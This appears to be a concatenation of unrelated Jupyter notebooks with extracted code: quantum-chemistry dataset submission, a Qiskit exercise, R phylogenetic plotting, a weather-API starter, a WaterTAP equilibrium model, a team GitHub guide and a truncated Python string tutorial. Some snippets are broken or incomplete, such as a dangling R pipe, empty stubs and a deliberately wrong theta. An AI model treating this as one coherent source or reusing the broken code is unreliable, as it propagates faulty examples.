dataset.metadata.long_description_url = (
"https://github.com/openforcefield/qca-dataset-submission/tree/master/"
"submissions/"
"2021-10-01-OpenFF-resppol-mp2-single-point"
)
# dataset.provenance["constructure"] = "0.0.1"
```
Make sure the molecules in the dataset match the input molecules
```
old_smiles = {Molecule.from_smiles(smiles).to_smiles(isomeric=False) for smiles in smiles_patterns}
new_smiles = {molecule.to_smiles(isomeric=False) for molecule in dataset.molecules}
assert len(old_smiles.symmetric_difference(new_smiles)) == 0
confs = np.array([len(mol.conformers) for mol in dataset.molecules])
print("Number of unique molecules ", dataset.n_molecules)
print("Number of filtered molecules ", dataset.n_filtered)
print("Number of conformers ", dataset.n_records)
print("Number of conformers min mean max",
confs.min(), "{:6.2f}".format(confs.mean()), confs.max())
masses = []
for molecule in dataset.molecules:
oemol = molecule.to_openeye()
mass = oechem.OECalculateMolecularWeight(oemol)
masses.append(mass)
print(f'Mean molecular weight: {np.mean(np.array(masses)):.2f}')
print(f'Max molecular weight: {np.max(np.array(masses)):.2f}')
print("Charges:", sorted(set(m.total_charge/m.total_charge.unit for m in dataset.molecules)))
```
Describe the dataset
```
pprint(dataset.metadata.dict())
for spec, obj in dataset.qc_specifications.items():
print("Spec:", spec)
pprint(obj.dict())
```
Export the dataset.
```
dataset.export_dataset("dataset-v1.1.json.bz2")
dataset.molecules_to_file("dataset-v1.1.smi", "smi")
dataset.visualize("dataset-v1.1.pdf", columns=8)
```
|
github_jupyter
|
import logging
import warnings
from pprint import pprint
import numpy as np
from openeye import oechem
from openff.qcsubmit.common_structures import QCSpec, PCMSettings
from openff.qcsubmit.factories import OptimizationDatasetFactory
from openff.qcsubmit.workflow_components import StandardConformerGenerator
from openff.toolkit.topology import Molecule
from qcelemental.models.results import WavefunctionProtocolEnum
from tqdm import tqdm
from openff.toolkit.utils import GLOBAL_TOOLKIT_REGISTRY, OpenEyeToolkitWrapper
GLOBAL_TOOLKIT_REGISTRY.deregister_toolkit(OpenEyeToolkitWrapper)
# Warnings that tell us we have undefined stereo and charged molecules
logging.getLogger("openff.toolkit").setLevel(logging.ERROR)
warnings.simplefilter("ignore")
with open("molecules.smi") as file:
smiles_patterns = file.read().split("\n")
smiles_patterns = [pattern for pattern in smiles_patterns if len(pattern) > 0]
molecules = [
Molecule.from_smiles(s)
for s in tqdm(smiles_patterns)
]
print(len(molecules))
# Required due to occasional SCF failures. See the V1 dataset as well as
# http://forum.psicode.org/t/dft-scf-not-converging/1725/3
# dft_ultra_fine_keywords = dict(
# dft_spherical_points=590,
# dft_radial_points=99,
# dft_pruning_scheme="robust"
# )
external_field = {
"X-": [-0.01, 0.0, 0.0],
"X+": [0.01, 0.0, 0.0],
"Y-": [0.0, -0.01, 0.0],
"Y+": [0.0, 0.01, 0.0],
"Z-": [0.0, 0.0, -0.01],
"Z+": [0.0, 0.0, 0.01],
}
qc_specifications = {}
for key, value in external_field.items():
qc_specifications[f"MP2/aug-cc-pVTZ/{key}"] = QCSpec(
method="MP2",
basis="aug-cc-pVTZ",
spec_name=f"MP2/aug-cc-pVTZ/{key}",
spec_description=(
"The quantum chemistry specification used to generate data for typed polarizabilities training."
),
keywords= {
"scf_type": "df",
"mp2_type": "df",
"E_CONVERGENCE": "1.0e-8",
"PERTURB_H": True,
"PERTURB_WITH": "DIPOLE",
"PERTURB_DIPOLE": value, # ["X-", "X+", "Y-", "Y+", "Z-", "Z+"]
},
store_wavefunction=WavefunctionProtocolEnum.orbitals_and_eigenvalues
)
qc_specifications["MP2/aug-cc-pVTZ"] = QCSpec(
method="MP2",
basis="aug-cc-pVTZ",
spec_name="MP2/aug-cc-pVTZ",
spec_description=(
"The quantum chemistry specification used to generate data for typed polarizabilities training."
),
store_wavefunction=WavefunctionProtocolEnum.orbitals_and_eigenvalues
)
dataset_factory = OptimizationDatasetFactory(
qc_specifications=qc_specifications
)
dataset_factory.add_workflow_components(
StandardConformerGenerator(max_conformers=5, rms_cutoff=0.1, clear_existing=True)
)
dataset = dataset_factory.create_dataset(
dataset_name="OpenFF RESP Polarizability Optimizations v1.1",
tagline="Optimizations of ESP-fitting based direct polarizabilities.",
description="A data set used for training typed polarizabilities using direct polarization.\n"
"This data set only includes element C, H, N, and O.",
molecules=molecules,
)
dataset.metadata.submitter = "willawang"
dataset.metadata.long_description_url = (
"https://github.com/openforcefield/qca-dataset-submission/tree/master/"
"submissions/"
"2021-10-01-OpenFF-resppol-mp2-single-point"
)
# dataset.provenance["constructure"] = "0.0.1"
old_smiles = {Molecule.from_smiles(smiles).to_smiles(isomeric=False) for smiles in smiles_patterns}
new_smiles = {molecule.to_smiles(isomeric=False) for molecule in dataset.molecules}
assert len(old_smiles.symmetric_difference(new_smiles)) == 0
confs = np.array([len(mol.conformers) for mol in dataset.molecules])
print("Number of unique molecules ", dataset.n_molecules)
print("Number of filtered molecules ", dataset.n_filtered)
print("Number of conformers ", dataset.n_records)
print("Number of conformers min mean max",
confs.min(), "{:6.2f}".format(confs.mean()), confs.max())
masses = []
for molecule in dataset.molecules:
oemol = molecule.to_openeye()
mass = oechem.OECalculateMolecularWeight(oemol)
masses.append(mass)
print(f'Mean molecular weight: {np.mean(np.array(masses)):.2f}')
print(f'Max molecular weight: {np.max(np.array(masses)):.2f}')
print("Charges:", sorted(set(m.total_charge/m.total_charge.unit for m in dataset.molecules)))
pprint(dataset.metadata.dict())
for spec, obj in dataset.qc_specifications.items():
print("Spec:", spec)
pprint(obj.dict())
dataset.export_dataset("dataset-v1.1.json.bz2")
dataset.molecules_to_file("dataset-v1.1.smi", "smi")
dataset.visualize("dataset-v1.1.pdf", columns=8)
| 0.555918 | 0.691419 |
# Basic Synthesis of Single-Qubit Gates
```
from qiskit import *
from qiskit.tools.visualization import plot_histogram
%config InlineBackend.figure_format = 'svg' # Makes the images look nice
import numpy as np
```
## 1
Show that the Hadamard gate can be written in the following two forms
$$H = \frac{X+Z}{\sqrt{2}} \equiv \exp\left(i \frac{\pi}{2} \, \frac{X+Z}{\sqrt{2}}\right).$$
Here $\equiv$ is used to denote that the equality is valid up to a global phase, and hence that the resulting gates are physically equivalent.
Hint: it might even be easiest to prove that $e^{i\frac{\pi}{2} M} \equiv M$ for any matrix whose eigenvalues are all $\pm 1$, and that such matrices uniquely satisfy $M^2=I$.
## 2
The Hadamard can be constructed from `rx` and `rz` operations as
$$ R_x(\theta) = e^{i\frac{\theta}{2} X}, ~~~ R_z(\theta) = e^{i\frac{\theta}{2} Z},\\ H \equiv \lim_{n\rightarrow\infty} \left( ~R_x\left(\frac{\theta}{n}\right) ~~R_z \left(\frac{\theta}{n}\right) ~\right)^n.$$
For some suitably chosen $\theta$. When implemented for finite $n$, the resulting gate will be an approximation to the Hadamard whose error decreases with $n$.
The following shows an example of this implemented with Qiskit with an incorrectly chosen value of $\theta$ (and with the global phase ignored).
* Determine the correct value of $\theta$.
* Show that the error (when using the correct value of $\theta$) decreases quadratically with $n$.
```
q = QuantumRegister(1)
c = ClassicalRegister(1)
error = {}
for n in range(1,11):
# Create a blank circuit
qc = QuantumCircuit(q,c)
# Implement an approximate Hadamard
theta = np.pi # here we incorrectly choose theta=pi
for j in range(n):
qc.rx(theta/n,q[0])
qc.rz(theta/n,q[0])
# We need to measure how good the above approximation is. Here's a simple way to do this.
# Step 1: Use a real hadamard to cancel the above approximation.
# For a good approximatuon, the qubit will return to state 0. For a bad one, it will end up as some superposition.
qc.h(q[0])
# Step 2: Run the circuit, and see how many times we get the outcome 1.
# Since it should return 0 with certainty, the fraction of 1s is a measure of the error.
qc.measure(q,c)
shots = 20000
job = execute(qc, Aer.get_backend('qasm_simulator'),shots=shots)
try:
error[n] = (job.result().get_counts()['1']/shots)
except:
pass
plot_histogram(error)
```
## 3
An improved version of the approximation can be found from,
$$H \equiv \lim_{n\rightarrow\infty} \left( ~ R_z \left(\frac{\theta}{2n}\right)~~ R_x\left(\frac{\theta}{n}\right) ~~ R_z \left(\frac{\theta}{2n}\right) ~\right)^n.$$
Implement this, and investigate the scaling of the error.
```
import qiskit
qiskit.__qiskit_version__
```
|
github_jupyter
|
from qiskit import *
from qiskit.tools.visualization import plot_histogram
%config InlineBackend.figure_format = 'svg' # Makes the images look nice
import numpy as np
q = QuantumRegister(1)
c = ClassicalRegister(1)
error = {}
for n in range(1,11):
# Create a blank circuit
qc = QuantumCircuit(q,c)
# Implement an approximate Hadamard
theta = np.pi # here we incorrectly choose theta=pi
for j in range(n):
qc.rx(theta/n,q[0])
qc.rz(theta/n,q[0])
# We need to measure how good the above approximation is. Here's a simple way to do this.
# Step 1: Use a real hadamard to cancel the above approximation.
# For a good approximatuon, the qubit will return to state 0. For a bad one, it will end up as some superposition.
qc.h(q[0])
# Step 2: Run the circuit, and see how many times we get the outcome 1.
# Since it should return 0 with certainty, the fraction of 1s is a measure of the error.
qc.measure(q,c)
shots = 20000
job = execute(qc, Aer.get_backend('qasm_simulator'),shots=shots)
try:
error[n] = (job.result().get_counts()['1']/shots)
except:
pass
plot_histogram(error)
import qiskit
qiskit.__qiskit_version__
| 0.605333 | 0.989722 |
```
library("ape")
library("ggplot2")
library("ggtree")
library(rphylopic)
nwk <- "../newick/species_of_interest.nh"
tree <- read.tree(nwk)
tree
ggtree(tree) + geom_treescale() + geom_tiplab()
ggtree(tree) + geom_treescale()
ggtree(tree, branch.length="none") %>% phylopic("9baeb207-5a37-4e43-9d9c-4cfb9038c0cc", color="darkgreen", alpha=.8, node=4) %>%
person <- name_search(text = "Chimp", options = "namebankID")[[1]]
person
person <- name_search(text = "ornithorhynchus anatinus", options = "namebankID")[[1]]
person
info <- read.csv("../newick/tree_info.csv")
info
library(ape)
tree <- read.nexus("../newick/tree.nex")
phylopic_info <- data.frame(node = c(124, 113, 110, 96, 89, 70),
phylopic = c("7fb9bea8-e758-4986-afb2-95a2c3bf983d",
"bac25f49-97a4-4aec-beb6-f542158ebd23",
"f598fb39-facf-43ea-a576-1861304b2fe4",
"aceb287d-84cf-46f1-868c-4797c4ac54a8",
"0174801d-15a6-4668-bfe0-4c421fbe51e8",
"72f2f854-f3cd-4666-887c-35d5c256ab0f"),
species = c("galagoids", "lemurs", "tarsiers",
"cebids", "hominoids", "cercopithecoids"))
pg <- ggtree(tree)
pg %<+% phylopic_info + geom_nodelab(aes(image=phylopic), geom="phylopic", alpha=.5, color='steelblue')
nwk <- "../newick/species_of_interest.nh"
info <- read.csv("../newick/tree_info.csv")
tree <- read.tree(nwk)
p <- ggtree(tree,branch.length=T, layout="circular") %<+% info + xlim(NA, 6)
p + geom_tiplab(aes(image= imageURL), geom="phylopic", offset=1.75, align=T, size=.06, hjust=1.66, color='steelblue') +
geom_tiplab(geom="label", offset=0.875, hjust=0.754) + theme(plot.margin=grid::unit(c(0,0,0,0), "mm"))
#p <- ggtree(tree) %<+% phylopic_info
#p + geom_tiplab() + geom_nodelab(aes(image=phylopic), geom="phylopic", alpha=.5, color='steelblue')
#geom_tiplab(aes(image= imageURL), geom="image", offset=2, align=T, size=.16, hjust=0) +
# geom_tiplab(geom="label", offset=1, hjust=.5)
ggsave('../figs/phylogenetic_tree_phylopic.pdf', width = 8, height = 8)
ggtree(tree, branch.length="none") %>% geom_tiplab("9baeb207-5a37-4e43-9d9c-4cfb9038c0cc",
color="darkgreen", alpha=.8)
#geom_nodelab(aes(image="9baeb207-5a37-4e43-9d9c-4cfb9038c0cc"), geom="phylopic", alpha=.5, color='steelblue')
#phylopic("9baeb207-5a37-4e43-9d9c-4cfb9038c0cc", color="darkgreen", alpha=.8, node=4) %>%
# phylopic("2ff4c7f3-d403-407d-a430-e0e2bc54fab0", color="darkcyan", alpha=.8, node=2) %>%
# phylopic("a63a929b-1b92-4e27-93c6-29f65184017e", color="steelblue", alpha=.8, node=3)
"mus_musculus" = c("2a557f56-b400-4d51-9d4a-1d74b7ed1cf9")
```
|
github_jupyter
|
library("ape")
library("ggplot2")
library("ggtree")
library(rphylopic)
nwk <- "../newick/species_of_interest.nh"
tree <- read.tree(nwk)
tree
ggtree(tree) + geom_treescale() + geom_tiplab()
ggtree(tree) + geom_treescale()
ggtree(tree, branch.length="none") %>% phylopic("9baeb207-5a37-4e43-9d9c-4cfb9038c0cc", color="darkgreen", alpha=.8, node=4) %>%
person <- name_search(text = "Chimp", options = "namebankID")[[1]]
person
person <- name_search(text = "ornithorhynchus anatinus", options = "namebankID")[[1]]
person
info <- read.csv("../newick/tree_info.csv")
info
library(ape)
tree <- read.nexus("../newick/tree.nex")
phylopic_info <- data.frame(node = c(124, 113, 110, 96, 89, 70),
phylopic = c("7fb9bea8-e758-4986-afb2-95a2c3bf983d",
"bac25f49-97a4-4aec-beb6-f542158ebd23",
"f598fb39-facf-43ea-a576-1861304b2fe4",
"aceb287d-84cf-46f1-868c-4797c4ac54a8",
"0174801d-15a6-4668-bfe0-4c421fbe51e8",
"72f2f854-f3cd-4666-887c-35d5c256ab0f"),
species = c("galagoids", "lemurs", "tarsiers",
"cebids", "hominoids", "cercopithecoids"))
pg <- ggtree(tree)
pg %<+% phylopic_info + geom_nodelab(aes(image=phylopic), geom="phylopic", alpha=.5, color='steelblue')
nwk <- "../newick/species_of_interest.nh"
info <- read.csv("../newick/tree_info.csv")
tree <- read.tree(nwk)
p <- ggtree(tree,branch.length=T, layout="circular") %<+% info + xlim(NA, 6)
p + geom_tiplab(aes(image= imageURL), geom="phylopic", offset=1.75, align=T, size=.06, hjust=1.66, color='steelblue') +
geom_tiplab(geom="label", offset=0.875, hjust=0.754) + theme(plot.margin=grid::unit(c(0,0,0,0), "mm"))
#p <- ggtree(tree) %<+% phylopic_info
#p + geom_tiplab() + geom_nodelab(aes(image=phylopic), geom="phylopic", alpha=.5, color='steelblue')
#geom_tiplab(aes(image= imageURL), geom="image", offset=2, align=T, size=.16, hjust=0) +
# geom_tiplab(geom="label", offset=1, hjust=.5)
ggsave('../figs/phylogenetic_tree_phylopic.pdf', width = 8, height = 8)
ggtree(tree, branch.length="none") %>% geom_tiplab("9baeb207-5a37-4e43-9d9c-4cfb9038c0cc",
color="darkgreen", alpha=.8)
#geom_nodelab(aes(image="9baeb207-5a37-4e43-9d9c-4cfb9038c0cc"), geom="phylopic", alpha=.5, color='steelblue')
#phylopic("9baeb207-5a37-4e43-9d9c-4cfb9038c0cc", color="darkgreen", alpha=.8, node=4) %>%
# phylopic("2ff4c7f3-d403-407d-a430-e0e2bc54fab0", color="darkcyan", alpha=.8, node=2) %>%
# phylopic("a63a929b-1b92-4e27-93c6-29f65184017e", color="steelblue", alpha=.8, node=3)
"mus_musculus" = c("2a557f56-b400-4d51-9d4a-1d74b7ed1cf9")
| 0.404155 | 0.259403 |
# WeatherPy
----
#### Note
* Instructions have been included for each segment. You do not have to follow them exactly, but they are included to help you think through the steps.
```
# Dependencies and Setup
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
import requests
import time
from scipy.stats import linregress
# Import API key
from api_keys import weather_api_key
# Incorporated citipy to determine city based on latitude and longitude
from citipy import citipy
# Output File (CSV)
output_data_file = "output_data/cities.csv"
# Range of latitudes and longitudes
lat_range = (-90, 90)
lng_range = (-180, 180)
```
## Generate Cities List
```
# List for holding lat_lngs and cities
lat_lngs = []
cities = []
# Create a set of random lat and lng combinations
lats = np.random.uniform(lat_range[0], lat_range[1], size=1500)
lngs = np.random.uniform(lng_range[0], lng_range[1], size=1500)
lat_lngs = zip(lats, lngs)
# Identify nearest city for each lat, lng combination
for lat_lng in lat_lngs:
city = citipy.nearest_city(lat_lng[0], lat_lng[1]).city_name
# If the city is unique, then add it to a our cities list
if city not in cities:
cities.append(city)
# Print the city count to confirm sufficient count
len(cities)
```
### Perform API Calls
* Perform a weather check on each city using a series of successive API calls.
* Include a print log of each city as it'sbeing processed (with the city number and city name).
```
# Make a request for each of the indices
url = "http://api.openweathermap.org/data/2.5/weather?q="
response_json = []
for city in range(len(cities)):
print(f"Processing Record 1 of Set 1 | {cities[city]}")
# Get one of the posts
post_response = requests.get(url + str(cities[city]) + str("&appid=") + weather_api_key)
# Save post's JSON
response_json.append(post_response.json())
```
### Convert Raw Data to DataFrame
* Export the city data into a .csv.
* Display the DataFrame
## Inspect the data and remove the cities where the humidity > 100%.
----
Skip this step if there are no cities that have humidity > 100%.
```
# Get the indices of cities that have humidity over 100%.
# Make a new DataFrame equal to the city data to drop all humidity outliers by index.
# Passing "inplace=False" will make a copy of the city_data DataFrame, which we call "clean_city_data".
```
## Plotting the Data
* Use proper labeling of the plots using plot titles (including date of analysis) and axes labels.
* Save the plotted figures as .pngs.
## Latitude vs. Temperature Plot
## Latitude vs. Humidity Plot
## Latitude vs. Cloudiness Plot
## Latitude vs. Wind Speed Plot
## Linear Regression
#### Northern Hemisphere - Max Temp vs. Latitude Linear Regression
#### Southern Hemisphere - Max Temp vs. Latitude Linear Regression
#### Northern Hemisphere - Humidity (%) vs. Latitude Linear Regression
#### Southern Hemisphere - Humidity (%) vs. Latitude Linear Regression
#### Northern Hemisphere - Cloudiness (%) vs. Latitude Linear Regression
#### Southern Hemisphere - Cloudiness (%) vs. Latitude Linear Regression
#### Northern Hemisphere - Wind Speed (mph) vs. Latitude Linear Regression
#### Southern Hemisphere - Wind Speed (mph) vs. Latitude Linear Regression
|
github_jupyter
|
# Dependencies and Setup
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
import requests
import time
from scipy.stats import linregress
# Import API key
from api_keys import weather_api_key
# Incorporated citipy to determine city based on latitude and longitude
from citipy import citipy
# Output File (CSV)
output_data_file = "output_data/cities.csv"
# Range of latitudes and longitudes
lat_range = (-90, 90)
lng_range = (-180, 180)
# List for holding lat_lngs and cities
lat_lngs = []
cities = []
# Create a set of random lat and lng combinations
lats = np.random.uniform(lat_range[0], lat_range[1], size=1500)
lngs = np.random.uniform(lng_range[0], lng_range[1], size=1500)
lat_lngs = zip(lats, lngs)
# Identify nearest city for each lat, lng combination
for lat_lng in lat_lngs:
city = citipy.nearest_city(lat_lng[0], lat_lng[1]).city_name
# If the city is unique, then add it to a our cities list
if city not in cities:
cities.append(city)
# Print the city count to confirm sufficient count
len(cities)
# Make a request for each of the indices
url = "http://api.openweathermap.org/data/2.5/weather?q="
response_json = []
for city in range(len(cities)):
print(f"Processing Record 1 of Set 1 | {cities[city]}")
# Get one of the posts
post_response = requests.get(url + str(cities[city]) + str("&appid=") + weather_api_key)
# Save post's JSON
response_json.append(post_response.json())
# Get the indices of cities that have humidity over 100%.
# Make a new DataFrame equal to the city data to drop all humidity outliers by index.
# Passing "inplace=False" will make a copy of the city_data DataFrame, which we call "clean_city_data".
| 0.412294 | 0.82963 |
# Carbonic Acid Example
**STEPS**
1. Connect to database
2. Create a base 'thermo' config for liquid only system with FpcTP state variables
3. Add all components for carbonic acid problem to the base 'thermo' config
4. Create a base 'reaction' config
5. Find and add reactions to 'reaction' config based on the component list
6. Build an IDAES model from the database generated configs
7. Check the IDAES model for errors
## 1. Connect to database
```
from watertap.edb import ElectrolyteDB
print("connecting to " + str(ElectrolyteDB.DEFAULT_URL))
db = ElectrolyteDB()
```
## 2. Create base 'thermo' config
Here, we grab the "thermo_Liq_FpcTP" base, which will likely be the most common for simple acid systems.
```
thermo_base = db.get_base("thermo_Liq_FpcTP")
```
## 3. Add components to 'thermo' base
In this case, we know that our system is water + carbonic acid, which will produce the follow species.
```
comp_list = ["H2O", "H_+", "OH_-", "H2CO3", "HCO3_-", "CO3_2-"]
comps = db.get_components(component_names=comp_list)
for comp_obj in comps:
print("Adding " + str(comp_obj.name) + "" )
thermo_base.add(comp_obj)
```
## 4. Create base 'reaction' config
Unlike in the prior example, here we are going to place all reactions in a separate configuration dictionary and declare those reactions as equilibrium. This is likely the most common way to handle reactions in WaterTAP.
```
react_base = db.get_base("reaction")
```
## 5. Find and add reactions to 'reaction' base
The reactions that should be found include 'H2O_Kw', 'H2CO3_Ka1', and 'H2CO3_Ka2'. These are the deprotonation reactions of the acids in the system.
```
react_obj = db.get_reactions(component_names=comp_list)
for r in react_obj:
print("Found reaction: " + str(r.name))
react_base.add(r)
```
## 6. Build an IDAES model
After we have grabbed all necessary information from the database, the formatted configuration dictionaries can be obtained from the 'base' objects we created in steps 2 & 4. The configurations are accessible via *_base.idaes_config. Passing those configuration dictionaries to the IDAES objects (GenericParameterBlock and GenericReactionParameterBlock) allows us to build the IDAES model. In this case, we build an EquilibriumReactor model from those property blocks.
```
# Import specific pyomo objects
from pyomo.environ import (
ConcreteModel,
)
# Import the idaes objects for Generic Properties and Reactions
from idaes.generic_models.properties.core.generic.generic_property import (
GenericParameterBlock,
)
from idaes.generic_models.properties.core.generic.generic_reaction import (
GenericReactionParameterBlock,
)
# Import the idaes object for the EquilibriumReactor unit model
from idaes.generic_models.unit_models.equilibrium_reactor import EquilibriumReactor
# Import the core idaes objects for Flowsheets and types of balances
from idaes.core import FlowsheetBlock
thermo_config = thermo_base.idaes_config
reaction_config = react_base.idaes_config
model = ConcreteModel()
model.fs = FlowsheetBlock(default={"dynamic": False})
model.fs.thermo_params = GenericParameterBlock(default=thermo_config)
model.fs.rxn_params = GenericReactionParameterBlock(
default={"property_package": model.fs.thermo_params, **reaction_config}
)
model.fs.unit = EquilibriumReactor(
default={
"property_package": model.fs.thermo_params,
"reaction_package": model.fs.rxn_params,
"has_rate_reactions": False,
"has_equilibrium_reactions": True,
"has_heat_transfer": False,
"has_heat_of_reaction": False,
"has_pressure_change": False,
}
)
```
## 7. Check IDAES model for errors
In this last step, we probe the created model to make sure everything is ok. We first check to make sure that the units of the model are consistent, then we can check the degrees of freedom. In this particular case, we expect 8 degrees of freedom.
The number of degrees of freedom will be problem dependent. In this case, our degrees stem from (1) pressure, (2) temperature, and (3-8) the individual species-phase pairs:
(3) (H2O , Liq)
(4) (H_+ , Liq)
(5) (OH_- , Liq)
(6) (H2CO3 , Liq)
(7) (HCO3_- , Liq)
(8) (CO3_2- , Liq)
```
from pyomo.util.check_units import assert_units_consistent
from idaes.core.util.model_statistics import (
degrees_of_freedom,
)
assert_units_consistent(model)
assert degrees_of_freedom(model) == 8
```
|
github_jupyter
|
from watertap.edb import ElectrolyteDB
print("connecting to " + str(ElectrolyteDB.DEFAULT_URL))
db = ElectrolyteDB()
thermo_base = db.get_base("thermo_Liq_FpcTP")
comp_list = ["H2O", "H_+", "OH_-", "H2CO3", "HCO3_-", "CO3_2-"]
comps = db.get_components(component_names=comp_list)
for comp_obj in comps:
print("Adding " + str(comp_obj.name) + "" )
thermo_base.add(comp_obj)
react_base = db.get_base("reaction")
react_obj = db.get_reactions(component_names=comp_list)
for r in react_obj:
print("Found reaction: " + str(r.name))
react_base.add(r)
# Import specific pyomo objects
from pyomo.environ import (
ConcreteModel,
)
# Import the idaes objects for Generic Properties and Reactions
from idaes.generic_models.properties.core.generic.generic_property import (
GenericParameterBlock,
)
from idaes.generic_models.properties.core.generic.generic_reaction import (
GenericReactionParameterBlock,
)
# Import the idaes object for the EquilibriumReactor unit model
from idaes.generic_models.unit_models.equilibrium_reactor import EquilibriumReactor
# Import the core idaes objects for Flowsheets and types of balances
from idaes.core import FlowsheetBlock
thermo_config = thermo_base.idaes_config
reaction_config = react_base.idaes_config
model = ConcreteModel()
model.fs = FlowsheetBlock(default={"dynamic": False})
model.fs.thermo_params = GenericParameterBlock(default=thermo_config)
model.fs.rxn_params = GenericReactionParameterBlock(
default={"property_package": model.fs.thermo_params, **reaction_config}
)
model.fs.unit = EquilibriumReactor(
default={
"property_package": model.fs.thermo_params,
"reaction_package": model.fs.rxn_params,
"has_rate_reactions": False,
"has_equilibrium_reactions": True,
"has_heat_transfer": False,
"has_heat_of_reaction": False,
"has_pressure_change": False,
}
)
from pyomo.util.check_units import assert_units_consistent
from idaes.core.util.model_statistics import (
degrees_of_freedom,
)
assert_units_consistent(model)
assert degrees_of_freedom(model) == 8
| 0.655667 | 0.837952 |
# Coding in Teams
Collaborative coding is so essential to the process of solving interesting finance problems, that it underlies the [objectives](../about/objectives) at the front of this website.
This page is focused on helping your teams attack the project in the most effective way. And it includes a few things that will push your existing GitHub comfort level up and make your team more productive.
```{dropdown} **Q: How should you "meet"?**
A: It's up to you! Be entrepreneurial and run your group as you all see fit. (WhatsApp, groupme, google doc, zoom, skype...)
```
```{dropdown} **Q: How should you approach working concurrently on the project?**
A: You basically have three approaches:
1. Sequentially divide tasks and conquer, e.g. Person A does part 1, Person B does part 2 after A is done.
- _I.e. in asgn-05 we had three files: download_wiki, measure_risk, and analysis. You can split up your project in a similar fashion._
- Main advantages: Specialization + this "gives ownership" to one person for each part
2. Co-work on a task simultaneously: Persons A and B do a zoom share meeting and co code on person A's computer via screen share + remote control. Advantage: More brainpower, and good when the whole group is stuck.
3. Separately attack the same task, then combine your answers: Persons A and B separately do part 1, and compare answers/approach, and put together a finalized solution to part 1. This creates duplicate and discarded work product, but will generate more ideas on getting to the solution.
```
```{dropdown} **Q: How do we work in the project repo "at the same time"?**
The main issue is that two people might make conflicting changes. E.g., Johnny added a line to `data.py` but Cindy deleted a line from `data.py`.
A: You have, basically, two approaches, and you might use both at different points of the project:
1. **Free-for-all approach.** _Everyone works in the "master" branch of the repo all the time. This is what your default instinct might be. It can work, but you will probably have to fix merge conflicts to proceed at some point._
1. **The "branching" approach.** _Basically, you create a clone of the "master" branch to work on, and when you've finished your changes, you create a "pull request" where you ask the main project's owner (you and your own team, in this case) to pull your branch's changes into the master branch. See the demo video below._
```
```{warning} Warning! Warning! Warning!
**FOLLOW THESE RULES EVERY SINGLE TIME YOU WORK ON CODE OR DO ANYTHING IN THE REPO**
1. BEFORE YOU START ANY WORK FOR THE DAY: Go to GH Desktop and "Fetch/Pull" origin
2. WHEN YOU ARE DONE WITH A WORKING SESSION: Clear your code, rerun all, save file, then push to cloud
If you forget to fetch/pull before you start (and someone made a change on the github repo since you last synced), or if someone is working at the same time (and pushes a change to the github repo that conflicts with a change you made), you are likely to receive a "Merge Conflict" notification from GH Desktop.
```
```{admonotion} Other Recommendations and Advice
:class: tip
1. Your most experienced coder might be given "CEO" status over the repo and "leads the way" on pull requests and gives guidance on merge conflicts.
2. Instead of putting the entire project in one ipynb file, structure the project like the latest assignment:
- One code file to download each input needed,
- One code file to parse/transform each input,
- One "get_all_data" code file that, if executed, would run all files above
- One code to build the analysis sample, explore it, and analyze it
3. It's better to over communicate than under communicate, especially in our virtual world
```
<p style="font-size:2em"> Collaboration as a group </p>
**I would love your feedback on how you deal with the asynchronous work problem!**
- Please let me know what issues/problems your group runs into
- What solutions did you use (were they good or awful?)
- If your group has an easy time, or finds something that works well, please let me and your classmates know!
- Submit your experience on this via the discussion board
## Branching Demo
Above, I mentioned that one way that multiple people can work in the same repo at the same time is by "branching". Rather than explaining it, let's let one of our TAs do a walk through on how this can work!

<iframe width="560" height="315" src="https://www.youtube.com/embed/KuCzXlfF-pM" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
Here's the side text from the video:
- Open GH Desktop and create a toy repo
- start new branch "my work"
- add data/data.txt into folder (to simulate some work you've done)
- see how GH Desktop sees a change?
- click to try to switch branch (don't though)
- it says "leave changes on this branch or bring to master" --> only the branch you're "in" can see/push changes you make
- cancel
- commit to branch
- publish up to GH website
- view on GH
- switch branches to see the new files
- compare: you're able to merge
- can explain your argument for changes (to convince others to adopt in distributed projects), submit
- merge, confirm
- look at master branch - it should have data/data.txt
- create "cynthia_did_some_work.txt" which says inside: "while i was sleeping"
- go back to desktop like you're going to work on the project
- go to master... pulling origin would sync it but dont
- go to "my work" branch
- fetch / update from master: this gets the cynthia file, and I can continue
- push this new file back up to my own branch on GH's servers
- make a new fake work file
- publish/push
- pull request
- merge into main one more time
|
github_jupyter
| 0.001731 | 0.925162 |
|
# string and text
```
# ๅค่ก็ปๆ่พๅบๆฏๆ
from IPython.core.interactiveshell import InteractiveShell
InteractiveShell.ast_node_interactivity = "all"
line = 'asdf fjdk; afed, fjek,asdf, foo'
import re
re.split(r'[;,\s]\s*', line)
```
* ๅฝๆฐ re.split() ๆฏ้ๅธธๅฎ็จ็๏ผๅ ไธบๅฎๅ
่ฎธไฝ ไธบๅ้็ฌฆๆๅฎๅคไธชๆญฃๅๆจกๅผ
* ๆฃๆฅๅญ็ฌฆไธฒๅผๅคดๆ็ปๅฐพ็ไธไธช็ฎๅๆนๆณๆฏไฝฟ็จ str.startswith() ๆ่
ๆฏ str.endswith() ๆนๆณ
* ๆฃๆฅๅค็งๅน้
ๅฏ่ฝ๏ผๅช้่ฆๅฐๆๆ็ๅน้
้กนๆพๅ
ฅๅฐไธไธชๅ
็ปไธญๅป๏ผ ็ถๅไผ ็ป startswith() ๆ่
endswith() ๆนๆณ
* startswith() ๅ endswith() ๆนๆณๆไพไบไธไธช้ๅธธๆนไพฟ็ๆนๅผๅปๅๅญ็ฌฆไธฒๅผๅคดๅ็ปๅฐพ็ๆฃๆฅใ ็ฑปไผผ็ๆไฝไนๅฏไปฅไฝฟ็จๅ็ๆฅๅฎ็ฐ๏ผไฝๆฏไปฃ็ ็่ตทๆฅๆฒกๆ้ฃไนไผ้
```
filename = 'spam.txt'
filename.endswith('.txt')
filename.startswith('file:')
url = 'http://www.python.org'
url.startswith('http:')
filenames = [ 'Makefile', 'foo.c', 'bar.py', 'spam.c', 'spam.h' ]
[name.endswith('.py') for name in filenames]
# ๆฏๅฆๅญๅจ True
any(name.endswith('.py') for name in filenames)
```
## ็จShell้้
็ฌฆๅน้
ๅญ็ฌฆไธฒ
* ๅฆๆไฝ ็ไปฃ็ ้่ฆๅๆไปถๅ็ๅน้
๏ผๆๅฅฝไฝฟ็จ glob ๆจกๅ
* ๅฏนไบๅคๆ็ๅน้
